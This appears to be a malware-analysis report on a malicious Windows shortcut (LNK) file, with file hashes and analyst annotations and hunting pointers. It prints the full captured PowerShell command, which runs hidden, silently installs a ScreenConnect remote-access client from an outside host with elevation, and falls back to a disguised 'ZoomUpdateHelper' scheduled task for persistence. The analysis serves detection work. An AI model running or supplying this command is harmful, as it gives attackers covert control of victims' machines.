Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
8bca62ec55d3f0a8870fb630f58e12b8
Sha1
d45b50833624bfe7297fb93c0483fb0f38c46737
Sha256
d1e6e3515ab24c3403845bb89e0cebb1fff721632735dee1fe92e7be261a8d22
Sha384
bd414be2be89d59aeb800a99afe98546ca9b21e23688f81c684828a7870e2044f0a70c4ff47c8286c9cfe36d596d89e1
Sha512
548a8ecb0e9f694d458059540b1c8f19f5d748525320dcf48f2afce99cae7ea31c34377e855fb87862bcecca55983fc7643414f1ea074033ac202fd26a5b2018
SSDeep
48:93IQ/HrVVeTWmQnohNKa19ByChioh4aQQVqlx0I72/Ho:FIQ/HClzDXyiVQgyGI72/Ho
TLSH
2C310A22697DB84CD461E7F68B7D23BF465AA5F38C8DA1D1220AFAF21C066C006305C4
Artefacts
Name
Value
LNK: Command Execution

# Analyst annotation: these comment lines are not part of the captured LNK command line,
# which follows unchanged on the last line.
# Launch flags: -NoProfile, -WindowStyle Hidden and -ExecutionPolicy Bypass start PowerShell
#   with no visible window and without the execution-policy check.
# $u: a remote MSI URL. The file name suggests a ScreenConnect remote-access client installer
#   (inferred from the name only; the MSI itself is not shown on this page).
# $msiArgs: msiexec installs directly from that URL with no UI (/qn /quiet) and with reboots
#   suppressed (/norestart, REBOOT=ReallySuppress).
# $hide: %APPDATA%\Zoom\Plugins is created if missing; nothing later in this command uses it.
# Retry loop: up to 3 attempts through Start-Process -Verb RunAs (requests elevation), each
#   waited on; exit code 0 or 3010 (Windows Installer "success, reboot required") counts as
#   success, otherwise the loop sleeps 8 seconds and tries again.
# Fallback persistence: if every attempt fails, a scheduled task named 'ZoomUpdateHelper' is
#   registered to run msiexec.exe with the same arguments at logon, with -RunLevel Highest.
# Hunting pointers: msiexec.exe started by powershell.exe with "/i" followed by an https URL;
#   a scheduled task 'ZoomUpdateHelper' whose action is msiexec.exe; a Zoom\Plugins folder
#   under %APPDATA% on hosts that do not run Zoom; connections to the host named in $u.
powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command $u='https://ridgevico.com/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest'; $msiArgs=@('/i',$u,'/qn','/quiet','/norestart','REBOOT=ReallySuppress'); $hide=Join-Path $env:APPDATA 'Zoom\Plugins'; if(-not(Test-Path $hide)){New-Item -ItemType Directory -Path $hide -Force|Out-Null}; $ok=$false; foreach($try in 1..3){ $p=Start-Process msiexec.exe -ArgumentList $msiArgs -Verb RunAs -Wait -PassThru -WindowStyle Hidden; if($p.ExitCode -eq 0 -or $p.ExitCode -eq 3010){$ok=$true;break}; Start-Sleep -Seconds 8 }; if(-not $ok){ $a=New-ScheduledTaskAction -Execute 'msiexec.exe' -Argument ($msiArgs -join ' '); $t=New-ScheduledTaskTrigger -AtLogOn; $s=New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable; Register-ScheduledTask -TaskName 'ZoomUpdateHelper' -Action $a -Trigger $t -Settings $s -RunLevel Highest -Force|Out-Null }; exit

8bca62ec55d3f0a8870fb630f58e12b8 (1.61 KB)